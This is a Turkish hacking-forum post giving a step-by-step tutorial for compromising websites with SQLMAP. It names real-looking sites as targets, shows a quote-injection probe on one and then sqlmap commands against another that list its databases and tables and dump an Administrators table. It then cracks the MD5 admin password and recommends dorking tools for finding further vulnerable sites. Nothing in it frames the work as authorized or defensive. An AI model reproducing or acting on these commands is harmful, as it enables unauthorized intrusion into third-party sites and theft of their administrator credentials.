I

iwystic

Veteran
Joined
Aug 27, 2019
Messages
4,834
Reaction score
9,971
6bd224a8-e827-4593-b5b4-483338e9999e-python.png
+ Python 2.7 indirip kuruyoruz.
+ SQLMAP adlı dosyayı direkt Yerel Disk C'ye atıyoruz.
+ Intelli Tamper 2.7 adlı program, site dosyalarını verir. Bunu admin paneli bulmak için kullanırız.
+ Safe3 adlı program:, sitede çok sağlam SQL Injection taraması yapar

indir&virüstotal.png
Download // VirusTotal

NOT: Sorun yaşayanlar SQLMAP ve Python'u orjinal sitelerinden indirebilirler.
http://sqlmap.org/
https://www.python.org/download/releases/2.7/


PpUOkx.png

Adım 1: SQLMAP'ı CMD ile Çalıştırma

Yukarıdakileri yaptıktan sonra Başlat'tan CMD'Yİ açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım:

Code:
cd..

1605948835479.png

PpUOkx.png

Konsol C:\ dizinine geldikten sonra şu kodu yazalım:

Code:
cd sqlmap

1605948936170.png

SQLMAP'i çalıştırdık.

PpUOkx.png

Adım 2: SQL Açıklı Site Bulmak

+ Sitelerin bazı sayfalarında, blogların paylaşımlarında bir ID değeri olur. Örneğin: "page.php?id=18" gibi.

+ Örnek Site: Welcome to the DockGuard website
+ Yukarıda verdiğim siteye girip sondaki ID değerinin sonuna " ' " yani tek tırnak işareti koyduğunuzda aşağıdaki gibi;

Code:
 http://www.dockguard.co.uk/page.php?id=18'

Şu hatayı alacaksınız;

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''18''' at line 1

Bu ve benzeri hata metinleri sitede SQL açığı olduğuna dair en basit belirtilerdir.

PpUOkx.png

Adım 3: SQL Açıklı Siteyi Ele Geçirmek (Veritabanını Çekmek)

Adım 3.1 - Sitenin Veritabanı İsimlerini Çekme (Database)

SQLMAP'te sitenin veritabanı isimlerini çekmek için şu kodu kullanırız;

Code:
sqlmap.py -u http://hedefsite.com...aciklibolum?id=--dbs

Yani, biz açıklı olarak bulduğumuz herhangi bir siteyi çekmek için şu şekilde yazacağız;

Code:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193--dbs

Şimdi işleme geçelim; CMD'ye kodumuzu yazalım ve ENTER tuşuna basalım.

ENTER tuşuna bastığımızda, işleme geçiyor. SQLMAP'imiz ve aşağıdaki resimde kırmızı ile bir kısım işaretledim. Sonuna dikkat ederseniz, [Y/N] yazıyor; yani "Evet mi hayır mı?" diye soruyor.
Öyle kısımlarda "y" yazıp, ENTER tuşuna basıyoruz.

1605949771851.png

PpUOkx.png

Adım 3.2 - Veritabanı Tablolarını Çekmek

SQLMAP'te sitenin tablolarını çekmek için şu kodu kullanırız;

Code:
sqlmap.py -u http://hedefurl.comVeritabanı_Adı --tables

Biz yukarıda bulduğumuz sitenin tablolarını çekmek için şu şekilde yazacağız;

Code:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193seaofstories_app --tables


NOT:
"information_schema" adlı veritabanı ile işimiz yok. Bizim işimiz, "seaofstories_app" adlı veritabanıyladır. Yukarıdaki kodu yazıp enter'a bastığımızda bize tablo isimlerini verecektir.

İşlem bittiğinde, bize tablo isimlerini verecektir. Biz orda işimize yarayanı tespit edeceğiz; Yani, örnek olarak, "Administrator" tablosunu buldu diyelim, Administrator tablosunun kolonlarını çekeceğiz.

PpUOkx.png

Adım 3.3 - Veritabanı Tablolalarının Kolonlarını Çekmek

SQLMAP'te tablo kolonlarını çekmek için şu kodu kullanırız;

Code:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı --columns

Yani, yukarıdaki sitemizin Administrator tablosunun kolonlarını çekmek için kodları şu şekilde yazacağız;

Code:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators --columns

Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda bize o tablonun kolonlarını işlem sırasında çekecektir.

1605950486340.png

Gördüğünüz gibi kolonları çekti. Şimdi sıra geldi son işleme.
Bize panele girmek için "Username" ve "Password" kolonlarındaki ID ve şifreler gereklidir. Bunun için, 3.4. adıma gidiyoruz.

PpUOkx.png

Adım 3.4 - Kolonlardaki Verileri (Username & Password) Çekme

SQLMAP'te kolonlardaki verileri çekmek için şu kodu kullanırız;

Code:
sqlmap.py -u http://hedefurl.com-D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı --dump

Yani, yukarıdaki sitemizin password kolonlarındaki verilerini çekmek kodları için şu şekilde yazacağız;

Code:
sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C password --dump

Bu şekilde kodumuzu yazıp ENTER tuşuna bastığımızda, bize admin şifrelerini çekecektir.

1605950799522.png

Yukarıda gördüğünüz gibi MD5 şifreyi tespit etti ve üstte kırmızı ile işaretlediğim yerlerde bize sorular sordu, "y" yazıp enter tuşuna bastık. Diğerinde de wordlist kullanılsın mı diye sordu ve MD5'i kırmak için orada direkt "ENTER" tuşuna bastık. Her şeyi detaylı şekilde işaretledim ve altta kırmızı ile işaretlediğim yerde şifrenin kırılmış halini bize verdi.

NOT: Aynı şekilde "username" adlı kolonu çekip admin giriş ID'lerine ulaşırsınız ve aynı şekilde olduğu için onu detaylı olarak göstermedim. Onun kodunu yazarken de bu şekilde yazacaksınız;

Code:
 sqlmap.py -u http://www.seaofstories.com/title.php?id=5193-D seaofstories_app -T Administrators -C username --dump

PpUOkx.png

Yardımcı Olabilecek Yazılımlar:

Veteran Dork Studio 3 FINAL - Dork Yardımcı Programı
Veteran SQLMAP Helper - SQLMAP Kod Yardımcı Programı

PpUOkx.png

İyi Forumlar.
 
SPAM IS FORBIDDEN!
  • SPAMMERS ARE BANNED FROM THE FORUM AND CANNOT USE ANY OF THE CHEATS
  • For example: thanks, thx, very good, asdqwe, working, ty and so on!
  • For example: Writing the same message over and over. thanks, thx and so on!
  • Copying and copying someone else's message is prohibited.
  • It is forbidden to send messages to increase the number of comments on threads that you have no knowledge of.
  • Write your own opinion when commenting!
  • If you see spam message, please let us know with the REPORT button!

Tema düzenleyici

Top Bottom